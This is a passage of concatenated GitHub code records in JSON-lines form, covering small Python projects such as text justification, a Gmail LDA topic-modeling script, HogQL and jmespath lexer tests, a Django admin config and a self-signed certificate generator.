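                # (Added explanatory comment, not from the original file.)
                # This branch is the exact-fit case: the buffered words
                # joined by single spaces plus the current word fill the
                # line to exactly maxWidth, so the line is emitted verbatim
                # and the running width, buffer, and word count all reset.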
number = 0\n elif number != 1:\n sub_ans = \"\"\n number = number - 1\n space = (maxWidth - now + 1) / number\n space = int(space)\n res = (maxWidth - now + 1) % number\n for index in sub_str[:len(sub_str) - 1:]:\n sub_ans += index + \" \" + \" \" * space\n if res != 0:\n sub_ans += \" \"\n res -= 1\n sub_ans += sub_str[-1]\n ans.append(sub_ans)\n now = len(string) + 1\n sub_str.clear()\n sub_str.append(string)\n number = 1\n else:\n sub_ans = sub_str[0]\n sub_ans += \" \" * (maxWidth - len(sub_ans))\n ans.append(sub_ans)\n now = len(string) + 1\n sub_str.clear()\n sub_str.append(string)\n number = 1\n sub_ans = \"\"\n if sub_str:\n for string in sub_str:\n sub_ans += string + \" \"\n sub_ans = sub_ans[:-1]\n sub_ans += \" \" * (maxWidth - len(sub_ans))\n ans.append(sub_ans)\n return ans\n\n\nif __name__ == '__main__':\n words = [\"Science\",\"is\",\"what\",\"we\",\"understand\",\"well\",\"enough\",\"to\",\"explain\",\n \"to\",\"a\",\"computer.\",\"Art\",\"is\",\"everything\",\"else\",\"we\",\"do\"]\n maxWidth = 20\n print(Solution().fullJustify(words, maxWidth))\n","repo_name":"kelolemon/homework","sub_path":"python_project/lt68.py","file_name":"lt68.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10753047734","text":"#submission 49\nimport pandas as pd\n\n#Perform all the necessary preprocessing steps on the Red_Wine data\ndf = pd.read_csv('Red_Wine.csv')\n\ndf['wine names']=df['wine names'].fillna(df['wine names'].mode()[0]) #removing NaN\nfor i in df.iloc[:,1:]:\n df[i] = df[i].fillna(df[i].mean())\n\n#split into features and labels \nfeatures = df.iloc[:,:-1]\nlabels = df.iloc[:,-1]\n\n#categorial data processing using pandas\nfeatures.iloc[:,0] = features.iloc[:,0].astype('category').cat.codes\nlabels = labels.astype('category').cat.codes\nfeatures = pd.get_dummies(features,columns=['wine names'])\n\n#Split the data into train and test sets\nfrom sklearn.model_selection import train_test_split as tts\nf_test,f_train,l_test,l_train = tts(features,labels,random_state=0,test_size=.25)\n","repo_name":"nimish19/Learning_ML","sub_path":"09-01-2019/nimish_agarwal49.py","file_name":"nimish_agarwal49.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39510993009","text":"from posthog.hogql import ast\nfrom posthog.hogql.errors import HogQLException\nfrom posthog.hogql.parser import parse_expr\nfrom posthog.hogql.placeholders import replace_placeholders, find_placeholders\nfrom posthog.test.base import BaseTest\n\n\nclass TestParser(BaseTest):\n def test_find_placeholders(self):\n expr = parse_expr(\"{foo} and {bar}\")\n self.assertEqual(sorted(find_placeholders(expr)), sorted([\"foo\", \"bar\"]))\n\n def test_replace_placeholders_simple(self):\n expr = parse_expr(\"{foo}\")\n self.assertEqual(\n expr,\n ast.Placeholder(field=\"foo\", start=0, end=5),\n )\n expr2 = replace_placeholders(expr, {\"foo\": ast.Constant(value=\"bar\")})\n self.assertEqual(\n expr2,\n ast.Constant(value=\"bar\", start=0, end=5),\n )\n\n def test_replace_placeholders_error(self):\n expr = ast.Placeholder(field=\"foo\")\n with self.assertRaises(HogQLException) as context:\n replace_placeholders(expr, {})\n self.assertEqual(\n \"Placeholders, such as {foo}, are not supported in this context\",\n str(context.exception),\n )\n with self.assertRaises(HogQLException) as context:\n replace_placeholders(expr, 
{\"bar\": ast.Constant(value=123)})\n self.assertEqual(\n \"Placeholder {foo} is not available in this context. You can use the following: bar\",\n str(context.exception),\n )\n\n def test_replace_placeholders_comparison(self):\n expr = parse_expr(\"timestamp < {timestamp}\")\n self.assertEqual(\n expr,\n ast.CompareOperation(\n start=0,\n end=23,\n op=ast.CompareOperationOp.Lt,\n left=ast.Field(chain=[\"timestamp\"], start=0, end=9),\n right=ast.Placeholder(field=\"timestamp\", start=12, end=23),\n ),\n )\n expr2 = replace_placeholders(expr, {\"timestamp\": ast.Constant(value=123)})\n self.assertEqual(\n expr2,\n ast.CompareOperation(\n start=0,\n end=23,\n op=ast.CompareOperationOp.Lt,\n left=ast.Field(chain=[\"timestamp\"], start=0, end=9),\n right=ast.Constant(value=123, start=12, end=23),\n ),\n )\n\n def test_assert_no_placeholders(self):\n expr = ast.Placeholder(field=\"foo\")\n with self.assertRaises(HogQLException) as context:\n replace_placeholders(expr, None)\n self.assertEqual(\n \"Placeholders, such as {foo}, are not supported in this context\",\n str(context.exception),\n )\n","repo_name":"PostHog/posthog","sub_path":"posthog/hogql/test/test_placeholders.py","file_name":"test_placeholders.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"24792421249","text":"from django.contrib import admin\nfrom . import models\nfrom django.utils.safestring import mark_safe\n# ==================================\n\n# classes\nclass ArtistAdmin(admin.ModelAdmin):\n prepopulated_fields = {'slug': ('name',), }\n list_display = ('name','slug')\n search_fields = ('name','slug')\n\n\nclass CategoryAdmin(admin.ModelAdmin):\n prepopulated_fields = {'slug':('title',),}\n list_display = ('title','slug')\n\n\nclass SongAdmin(admin.ModelAdmin):\n prepopulated_fields = {'slug': ('title',), }\n list_display = ('title','slug','artist','category','get_cover')\n search_fields = ('title','artist__name','category__title')\n\n def get_cover(self,obj):\n return mark_safe(f'')\n get_cover.short_description = 'cover'\n \n# Register your models here.\n\nadmin.site.register(models.SongVote)\nadmin.site.register(models.Category,CategoryAdmin)\nadmin.site.register(models.Song,SongAdmin)\nadmin.site.register(models.Artist,ArtistAdmin)\n\n","repo_name":"Pouria03/Music-website","sub_path":"song/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10814847794","text":"from itertools import permutations \n \nclass Solution(object):\n def countArrangement(self, N):\n self.res = 0\n def dfs(n,tmp,remain):\n if n==N+1:\n self.res+=1\n else:\n for i in range(len(remain)): \n if remain[i]%n==0 or n%remain[i]==0:\n dfs(n+1,tmp+[i],remain[:i]+remain[i+1:])\n dfs(1,[],[i+1 for i in range(N)])\n return self.res\n\n ","repo_name":"Ayushmanglani/competitive_coding","sub_path":"leetcode/Jan_2021/3_BeautifulArrangement.py","file_name":"3_BeautifulArrangement.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72439240808","text":"import time\ndef fibo_max(max:int):\n n1,n2 = 0,1\n counter = 0\n while True:\n if counter <= max:\n yield n1\n aux = n1+n2\n n1,n2 = n2, aux\n counter += 1\n else:\n raise StopIteration\n\nif __name__ == \"__main__\":\n fibonacci = fibo_max(20)\n for element in 
fibonacci:\n print (element)\n time.sleep(1)\n \n ","repo_name":"cquinayas/curso-profesional-python","sub_path":"generator_challenge.py","file_name":"generator_challenge.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27602438332","text":"\"\"\"\nPerform LDA (Latent Dirichlet Allocation) on a gmail inbox\nto cluster e-mails into topics (topic modeling)\n\nStarter code for validating credentials from:\n https://developers.google.com/gmail/api/quickstart/python\n\nAuthor: Darshan Thaker\n\"\"\"\n#!/usr/bin/python\n\nfrom __future__ import print_function\nimport httplib2\nimport os\nimport pprint\nimport base64\nimport time\nimport sys\nimport threading\n\nfrom apiclient import discovery\nfrom gensim import corpora, models, similarities\nfrom collections import defaultdict\nimport oauth2client\nfrom oauth2client import client\nfrom oauth2client import tools\n\ntry:\n import argparse\n parser = argparse.ArgumentParser(parents=[tools.argparser])\n parser.add_argument(\"nWorkers\", type=int)\n parser.add_argument(\"preExisting\", type=int)\n newFlags = parser.parse_args()\n # These flags are for getCredentials function for Gmail API\n flags = parser.parse_args()\n del flags.nWorkers\n del flags.preExisting\nexcept ImportError:\n flags = None\n\n\"\"\"\n My barrier implementation for Python2.7\n\"\"\"\nclass Barrier:\n \"\"\"\n Constructor for Barrier\n Input: n for number of threads that need to be\n synchronized.\n \"\"\"\n def __init__(self, n):\n self.togo = n\n self.sem = threading.Semaphore(0)\n self.mutex = threading.Semaphore(1)\n self.count = 0\n \n \"\"\"\n Make sure all threads reach sync() before continuing.\n Block until all threads have reached this point.\n \"\"\"\n def sync(self):\n self.mutex.acquire()\n self.count += 1\n self.mutex.release()\n if (self.count < self.togo):\n self.sem.acquire()\n self.sem.release()\n\nSCOPES = 'https://www.googleapis.com/auth/gmail.readonly'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Gmail Topic Modeling'\nDICTIONARY_FILE = 'gmail.dict'\nCORPUS_FILE = 'gmailCorpus.mm'\nMODEL_FILE = 'LDAmodel'\nNUM_WORKERS = int(newFlags.nWorkers)\nPREEXISTING = bool(newFlags.preExisting)\nQUERY = 'label:inbox'\n# Barrier for NUM_WORKERS threads + 1 main thread\nbarrier = Barrier(NUM_WORKERS + 1)\n\ndef getCredentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'gmail-python-quickstart.json')\n\n store = oauth2client.file.Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n\n\"\"\"\n Worker thread that appends to the final list parameter\n final[0] = texts\n final[1] = corpus\n Input is a start and end index into the messages list\n\"\"\"\ndef 
dataWorker(start, end, final, messages):\n documents = []\n credentials = getCredentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n query = QUERY\n\n for i in range(start, end):\n msg_id = messages[i]['id']\n message = service.users().messages().get(userId='me', id=msg_id, format='full').execute()\n\n if 'multipart' in str(message['payload']['mimeType']):\n parts = message['payload']['parts']\n else:\n parts = [message['payload']]\n #pp = pprint.PrettyPrinter(indent=4)\n #pp.pprint(message)\n\n for content in parts:\n if content['mimeType'] == 'text/plain':\n try:\n fullMessage = base64.urlsafe_b64decode(str(content['body']['data']))\n fullMessage = fullMessage.decode('unicode-escape', 'ignore')\n documents.append(fullMessage)\n #print(base64.urlsafe_b64decode(str(content['body']['data'])))\n except KeyError:\n continue\n\n print(\"Removing stopwords...\")\n stoplist = set((\"for a an this under through are them with you got we that be as our\" +\n \"have your of what is his her on at and or to in not aren't when \\r \\n\").split())\n texts = [[word for word in document.lower().split() if word not in stoplist]\n for document in documents] \n startlist = tuple('> http - ~ = the [ 1 2 3 4 5 6 7 8 9 0 from www ..'.split())\n texts = [[word for word in text if not word.startswith(startlist)] for text in texts]\n\n # Remove words that appear only once\n print(\"Removing words that appear only once...\")\n frequency = defaultdict(int)\n for text in texts:\n for token in text:\n frequency[token] += 1\n texts = [[token for token in text if frequency[token] > 1]\n for text in texts] \n dictionary = corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(text) for text in texts]\n final.append(texts)\n final.append(corpus)\n barrier.sync()\n\n\"\"\"\n Reads the list of messages that match the given query from the Gmail API\n Spawns NUM_WORKERS threads that operate on partitions of the messages list.\n\"\"\"\ndef prepareData():\n credentials = getCredentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n query = QUERY\n\n response = service.users().messages().list(userId='me', q=query).execute()\n\n messages = []\n if 'messages' in response:\n messages.extend(response['messages']) \n\n while 'nextPageToken' in response:\n page_token = response['nextPageToken']\n response = service.users().messages().list(userId='me', q=query,\n pageToken=page_token).execute()\n messages.extend(response['messages'])\n\n #print(\"len(messages) = %d\" % (len(messages)))\n textsSub = [[] for x in range(0, NUM_WORKERS)]\n\n start = time.time()\n for i in range(0, NUM_WORKERS):\n #Partition the messages list to each thread\n low = (i * len(messages) / NUM_WORKERS)\n if (i == NUM_WORKERS - 1):\n high = len(messages)\n else:\n high = ((i + 1) * len(messages)/NUM_WORKERS)\n \n thread = threading.Thread(target=dataWorker, args=(low, high, textsSub[i], messages))\n thread.start()\n\n # Use a barrier for synchronization to make sure all threads have finished\n barrier.sync()\n # Merge all the texts and corpuses generated from each thread into one large texts and corpus list\n texts = [x for text in textsSub for x in text[0]]\n corpus = [x for corp in textsSub for x in corp[1]]\n #pprint.pprint(textsSub)\n\n print(\"Serializing dictionary...\")\n dictionary = corpora.Dictionary(texts)\n dictionary.save(DICTIONARY_FILE)\n\n print(\"Serializing corpus...\")\n corpora.MmCorpus.serialize(CORPUS_FILE, corpus)\n 
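    # (Added note, hedged.) Serializing the merged corpus in Matrix Market
    # format lets the LDA stage stream documents from disk rather than
    # keeping the whole bag-of-words in memory; gensim's LdaModel accepts
    # any iterable corpus, so main() can lazily reload it via
    # corpora.MmCorpus(CORPUS_FILE).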
print(\"Total took %d seconds\" % (time.time() - start))\n \n #pp = pprint.PrettyPrinter(indent=4)\n #pp.pprint(message)\n\ndef main():\n cwd = os.path.expanduser('.')\n dict_dir = os.path.join(cwd, DICTIONARY_FILE)\n corpus_dir = os.path.join(cwd, CORPUS_FILE)\n if not os.path.exists(dict_dir) or not os.path.exists(corpus_dir) or not PREEXISTING:\n if PREEXISTING:\n print(\"Selected 'use preExisting model', but doesn't exist\")\n else:\n print(\"Selected 'do not use preExisting model'\")\n # Only generate texts and corpus if needed or prompted by user.\n prepareData()\n \n print(\"Loading dictionary...\")\n id2word = corpora.Dictionary.load(DICTIONARY_FILE)\n print(\"Loading corpus...\")\n corpus = corpora.MmCorpus(CORPUS_FILE)\n\n print(\"Running LDA...\")\n lda = models.ldamodel.LdaModel(corpus=corpus, id2word=id2word,\n num_topics=100, update_every=1,\n chunksize=10000, passes=1)\n print(lda.print_topics(20))\n print(\"Saving model...\")\n lda.save(MODEL_FILE)\n \nif __name__ == '__main__':\n main()\n","repo_name":"darshanthaker/GLDA","sub_path":"GLDA.py","file_name":"GLDA.py","file_ext":"py","file_size_in_byte":8518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21391387039","text":"\"\"\"Test html small tag.\n\npoetry run pytest tests/test_html/test_tag_small.py\n\"\"\"\nimport pytest\n\nfrom src.djlint.reformat import formatter\nfrom tests.conftest import printer\n\ntest_data = [\n pytest.param(\n \"text\",\n \"text\\n\",\n id=\"small_tag\",\n ),\n]\n\n\n@pytest.mark.parametrize((\"source\", \"expected\"), test_data)\ndef test_base(source, expected, basic_config):\n output = formatter(basic_config, source)\n\n printer(expected, source, output)\n assert expected == output\n","repo_name":"Riverside-Healthcare/djLint","sub_path":"tests/test_html/test_tag_small.py","file_name":"test_tag_small.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"53"} +{"seq_id":"8236867463","text":"from socket import gethostname\n\nfrom OpenSSL import crypto\n\nCERT_FILE = \"xserver/coreserver/server.cert\"\nKEY_FILE = \"xserver/coreserver/server.key\"\n\n\ndef create_self_signed_cert():\n k = crypto.PKey()\n k.generate_key(crypto.TYPE_RSA, 1024)\n cert = crypto.X509()\n cert.get_subject().C = \"PL\"\n cert.get_subject().ST = \"Lublin\"\n cert.get_subject().L = \"Lublin\"\n cert.get_subject().O = \"c\"\n cert.get_subject().OU = \"c\"\n cert.get_subject().CN = 'localhost'\n print(gethostname())\n cert.set_serial_number(1000)\n cert.gmtime_adj_notBefore(0)\n cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60)\n cert.set_issuer(cert.get_subject())\n cert.set_pubkey(k)\n cert.sign(k, 'sha1')\n\n open(CERT_FILE, \"wt\").write(\n crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode())\n open(KEY_FILE, \"wt\").write(\n crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode())\n\n\ncreate_self_signed_cert()\n","repo_name":"RaVkloc/IRC_Chat","sub_path":"cert_creator.py","file_name":"cert_creator.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6260301199","text":"PARSER_INPUT_EXCHANGE_NAME = 'parsers'\nPARSER_OUTPUT_EXCHANGE_NAME = 'parser_results'\nUSER_ID = 'userId'\nDATETIME = 'datetime'\nRABBIT_DEFAULT_URL = 'rabbitmq://127.0.0.1:5672'\nMONGODB_DEFAULT_URL = 'mongodb://brain:brain@127.0.0.1:27017'\nSERVER_DEFAULT_HOST = '127.0.0.1'\nSERVER_DEFAULT_PORT = 
'8000'\nDB_NAME = 'brain_data'\nDB_SNAPSHOT_COLLECTION = 'snapshots'\nDN_USER_COLLECTION = 'users'\nDATA = 'data'\nFIELD = 'field'\nHEADER = 'header'\nUSER_TOPIC = 'user'\nAPI_RESOURCES_MODULE_PATH = 'api_resources'\nURL_FIELD = 'url'\nLOCALHOST = '127.0.0.1'\nDEFAULT_API_PORT = 5000\nDEFAULT_UI_PORT = 8080\nTIMESTAMP = 'timestamp'\nPOSE = 'pose'\nCOLOR_IMAGE = 'colorImage'\nDEPTH_IMAGE = 'depthImage'\nFEELINGS = 'feelings'\nSUPPORTED_FIELDS = 'supported_fields'\nSAVE_PATH = \"/brain_data/snapshot_data\"\nDUMP_FIELDS = ['colorImage', 'depthImage']\n\n","repo_name":"baraschner/brain","sub_path":"brain/utils/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23839760441","text":"'''\nProblem 4\nLargest palindrome product\n\nA palindromic number reads the same both ways. The largest palindrome\nmade from the product of two 2-digit numbers is 9009 = 91 × 99.\n\nFind the largest palindrome made from the product of two 3-digit numbers.\n'''\n\nimport math\nimport sys\n\npalindromes = []\ndef isPalindrome(number):\n\tn = number\n\treverse = 0\n\twhile(n > 0):\n\t\treverse = reverse * 10 + n % 10\n\t\tn = math.floor(n / 10)\n\treturn number == reverse\n\ndef EulerProblem0004():\n\tfor i in range(100, 1000, 1):\n\t\tfor j in range(100, 1000, 1):\n\t\t\tif isPalindrome(i * j):\n\t\t\t\tpalindromes.append(i * j)\n\n\tmaxPalindrome = max(palindromes)\n\n\tprint(maxPalindrome)\nif __name__ == \"__main__\":\n\tEulerProblem0004()\n\t\n","repo_name":"zhaphod/ProjectEuler","sub_path":"Python/proj_euler_problem_0004.py","file_name":"proj_euler_problem_0004.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14934908182","text":"from tkinter import StringVar, Misc\nfrom tkinter.ttk import OptionMenu\n\nfrom src.variable_handler import VariableHandler\n\n\nclass GenerationMenu(OptionMenu):\n \"\"\"A ttk option-menu with options for generations where the EV mechanics differ.\"\"\"\n def __init__(self, master: Misc, variable_handler: VariableHandler):\n self.generations = [\n 'Gen I-VI',\n 'Gen VII+'\n ]\n\n self._value = StringVar(master, self.generations[0])\n self._value.trace_add('write', lambda *_: variable_handler.set_value('generation', self.get_generation()))\n variable_handler.add_tracker(\n 'generation', lambda: self._value.set(self.generations[variable_handler.get_value('generation')])\n )\n super().__init__(master, self._value, self._value.get(), *self.generations)\n\n def get_generation(self) -> int:\n \"\"\"Returns the list index for the value of the option button.\"\"\"\n return self.generations.index(self._value.get())\n","repo_name":"MrNinjaPowha/ev-counter","sub_path":"src/components/blocks/generation_menu.py","file_name":"generation_menu.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25048374853","text":"def merge_sort(array):\n length = len(array)\n\n if length == 1:\n return array\n\n mid = length // 2\n\n left = merge_sort(array[:mid])\n right = merge_sort(array[mid:])\n\n return merge(left, right)\n\n\ndef merge(left, right):\n output = []\n i = j = 0\n\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n output.append(left[i])\n i += 1\n else:\n output.append(right[j])\n j += 1\n\n output.extend(left[i:])\n 
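    # (Added comment.) At most one of these two extends appends anything:
    # the loop above exits as soon as one side is exhausted, and the other
    # side's remaining tail is already sorted, so it is copied through
    # unchanged.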
output.extend(right[j:])\n\n return output","repo_name":"hadr0x/algorithms","sub_path":"sorting/merge-sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11988860528","text":"class Input:\n tmp = []\n\n def read_data(self):\n text = ''\n while text != 'done':\n text = input(\"> \")\n if not text != 'done':\n continue\n self.tmp.append(text)\n\n def to_string_list(self):\n print(self.tmp)\n\n def to_int_list(self):\n try:\n tmp = list(map(int, self.tmp))\n print(tmp)\n return tmp\n except ValueError:\n print(\"No es una list de int\")\n\n def revert(self):\n pass\n\n def calculate(self):\n pass\n\n\nclass ReverseText(Input):\n\n def __init__(self):\n super(ReverseText, self).__init__()\n\n def revert(self):\n print(self.tmp[::-1])\n\n\nclass CalculateNumbers(Input):\n\n def __init__(self):\n super(CalculateNumbers, self).__init__()\n\n def calculate(self):\n dif = {}\n nums = self.to_int_list()\n if nums is not None:\n for i, num in enumerate(nums):\n n = 50 - num\n if n not in dif:\n dif[num] = i\n else:\n print([dif[n], i])\n else:\n print(\"La list no es valid\")\n\n\ninput_1 = ReverseText()\ninput_1.read_data()\n\"input_1.to_int_list()\"\ninput_1.to_string_list()\ninput_1.revert()\n\n\"input_1 = CalculateNumbers()\"\n\"input_1.read_data()\"\n\"input_1.to_int_list()\"\n\"input_1.calculate()\"\n","repo_name":"jesusmares82-hub/contador_de_palabras_python","sub_path":"Ejemplos/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23522770944","text":"from ..utils import rest\nfrom ..utils.resource import Resource\n\n\nclass BrcodePreview(Resource):\n\n \"\"\"# BrcodePreview object\n DEPRECATED: USE PaymentPreview INSTEAD\n A BrcodePreview is used to get information from a BR Code you received to check the informations before paying it.\n ## Attributes (return-only):\n - status [string]: Payment status. ex: \"active\", \"paid\", \"canceled\" or \"unknown\"\n - name [string]: Payment receiver name. ex: \"Tony Stark\"\n - tax_id [string]: Payment receiver tax ID. ex: \"012.345.678-90\"\n - bank_code [string]: Payment receiver bank code. ex: \"20018183\"\n - branch_code [string]: Payment receiver branch code. ex: \"0001\"\n - account_number [string]: Payment receiver account number. ex: \"1234567\"\n - account_type [string]: Payment receiver account type. ex: \"checking\"\n - allow_change [bool]: If True, the payment is able to receive amounts that are different from the nominal one. ex: True or False\n - amount [integer]: Value in cents that this payment is expecting to receive. If 0, any value is accepted. ex: 123 (= R$1,23)\n - reconciliation_id [string]: Reconciliation ID linked to this payment. 
ex: \"txId\", \"payment-123\"\n \"\"\"\n\n def __init__(self, status, name, tax_id, bank_code, branch_code, account_number, account_type, allow_change, amount, reconciliation_id):\n self.status = status\n self.name = name\n self.tax_id = tax_id\n self.bank_code = bank_code\n self.branch_code = branch_code\n self.account_number = account_number\n self.account_type = account_type\n self.allow_change = allow_change\n self.amount = amount\n self.reconciliation_id = reconciliation_id\n\n\n_resource = {\"class\": BrcodePreview, \"name\": \"BrcodePreview\"}\n\n\ndef query(brcodes, user=None):\n \"\"\"# Retrieve BrcodePreviews\n Process BR Codes before creating BrcodePayments\n ## Parameters (optional):\n - brcodes [list of strings]: List of brcodes to preview. ex: [\"00020126580014br.gov.bcb.pix0136a629532e-7693-4846-852d-1bbff817b5a8520400005303986540510.005802BR5908T'Challa6009Sao Paulo62090505123456304B14A\"]\n - user [Organization/Project object, default None]: Organization or Project object. Not necessary if starkbank.user was set before function call\n ## Return:\n - generator of BrcodePreview objects with updated attributes\n \"\"\"\n return rest.get_stream(\n resource=_resource,\n brcodes=brcodes,\n limit=None,\n user=user,\n )\n","repo_name":"isaccanedo/sdk-python","sub_path":"starkbank/brcodepreview/__brcodepreview.py","file_name":"__brcodepreview.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13685903623","text":"from tests import unittest\n\nfrom jmespath import lexer\nfrom jmespath.exceptions import LexerError, EmptyExpressionError\n\n\nclass TestRegexLexer(unittest.TestCase):\n\n def setUp(self):\n self.lexer = lexer.Lexer()\n\n def assert_tokens(self, actual, expected):\n # The expected tokens only need to specify the\n # type and value. 
The line/column numbers are not\n # checked, and we use assertEqual for the tests\n # that check those line numbers.\n stripped = []\n for item in actual:\n stripped.append({'type': item['type'], 'value': item['value']})\n # Every tokenization should end in eof, so we automatically\n # check that value, strip it off the end, and then\n # verify the remaining tokens against the expected.\n # That way the tests don't need to add eof to every\n # assert_tokens call.\n self.assertEqual(stripped[-1]['type'], 'eof')\n stripped.pop()\n self.assertEqual(stripped, expected)\n\n def test_empty_string(self):\n with self.assertRaises(EmptyExpressionError):\n list(self.lexer.tokenize(''))\n\n def test_field(self):\n tokens = list(self.lexer.tokenize('foo'))\n self.assert_tokens(tokens, [{'type': 'unquoted_identifier',\n 'value': 'foo'}])\n\n def test_number(self):\n tokens = list(self.lexer.tokenize('24'))\n self.assert_tokens(tokens, [{'type': 'number',\n 'value': 24}])\n\n def test_negative_number(self):\n tokens = list(self.lexer.tokenize('-24'))\n self.assert_tokens(tokens, [{'type': 'number',\n 'value': -24}])\n\n def test_quoted_identifier(self):\n tokens = list(self.lexer.tokenize('\"foobar\"'))\n self.assert_tokens(tokens, [{'type': 'quoted_identifier',\n 'value': \"foobar\"}])\n\n def test_json_escaped_value(self):\n tokens = list(self.lexer.tokenize('\"\\u2713\"'))\n self.assert_tokens(tokens, [{'type': 'quoted_identifier',\n 'value': u\"\\u2713\"}])\n\n def test_number_expressions(self):\n tokens = list(self.lexer.tokenize('foo.bar.baz'))\n self.assert_tokens(tokens, [\n {'type': 'unquoted_identifier', 'value': 'foo'},\n {'type': 'dot', 'value': '.'},\n {'type': 'unquoted_identifier', 'value': 'bar'},\n {'type': 'dot', 'value': '.'},\n {'type': 'unquoted_identifier', 'value': 'baz'},\n ])\n\n def test_space_separated(self):\n tokens = list(self.lexer.tokenize('foo.bar[*].baz | a || b'))\n self.assert_tokens(tokens, [\n {'type': 'unquoted_identifier', 'value': 'foo'},\n {'type': 'dot', 'value': '.'},\n {'type': 'unquoted_identifier', 'value': 'bar'},\n {'type': 'lbracket', 'value': '['},\n {'type': 'star', 'value': '*'},\n {'type': 'rbracket', 'value': ']'},\n {'type': 'dot', 'value': '.'},\n {'type': 'unquoted_identifier', 'value': 'baz'},\n {'type': 'pipe', 'value': '|'},\n {'type': 'unquoted_identifier', 'value': 'a'},\n {'type': 'or', 'value': '||'},\n {'type': 'unquoted_identifier', 'value': 'b'},\n ])\n\n def test_literal(self):\n tokens = list(self.lexer.tokenize('`[0, 1]`'))\n self.assert_tokens(tokens, [\n {'type': 'literal', 'value': [0, 1]},\n ])\n\n def test_literal_string(self):\n tokens = list(self.lexer.tokenize('`foobar`'))\n self.assert_tokens(tokens, [\n {'type': 'literal', 'value': \"foobar\"},\n ])\n\n def test_literal_number(self):\n tokens = list(self.lexer.tokenize('`2`'))\n self.assert_tokens(tokens, [\n {'type': 'literal', 'value': 2},\n ])\n\n def test_literal_with_invalid_json(self):\n with self.assertRaises(LexerError):\n list(self.lexer.tokenize('`foo\"bar`'))\n\n def test_literal_with_empty_string(self):\n tokens = list(self.lexer.tokenize('``'))\n self.assert_tokens(tokens, [{'type': 'literal', 'value': ''}])\n\n def test_position_information(self):\n tokens = list(self.lexer.tokenize('foo'))\n self.assertEqual(\n tokens,\n [{'type': 'unquoted_identifier', 'value': 'foo',\n 'start': 0, 'end': 3},\n {'type': 'eof', 'value': '', 'start': 3, 'end': 3}]\n )\n\n def test_position_multiple_tokens(self):\n tokens = list(self.lexer.tokenize('foo.bar'))\n 
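# 'foo.bar' should lex to identifier, dot, identifier plus the implicit\n        # trailing eof token, each carrying its start/end offset into the source\n        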
self.assertEqual(\n            tokens,\n            [{'type': 'unquoted_identifier', 'value': 'foo',\n              'start': 0, 'end': 3},\n             {'type': 'dot', 'value': '.',\n              'start': 3, 'end': 4},\n             {'type': 'unquoted_identifier', 'value': 'bar',\n              'start': 4, 'end': 7},\n             {'type': 'eof', 'value': '',\n              'start': 7, 'end': 7},\n            ]\n        )\n\n    def test_adds_quotes_when_invalid_json(self):\n        tokens = list(self.lexer.tokenize('`{{}`'))\n        self.assertEqual(\n            tokens,\n            [{'type': 'literal', 'value': '{{}',\n              'start': 0, 'end': 4},\n             {'type': 'eof', 'value': '',\n              'start': 5, 'end': 5}\n            ]\n        )\n\n    def test_unknown_character(self):\n        with self.assertRaises(LexerError) as e:\n            tokens = list(self.lexer.tokenize('foo[0^]'))\n\n    def test_bad_first_character(self):\n        with self.assertRaises(LexerError):\n            tokens = list(self.lexer.tokenize('^foo[0]'))\n\n    def 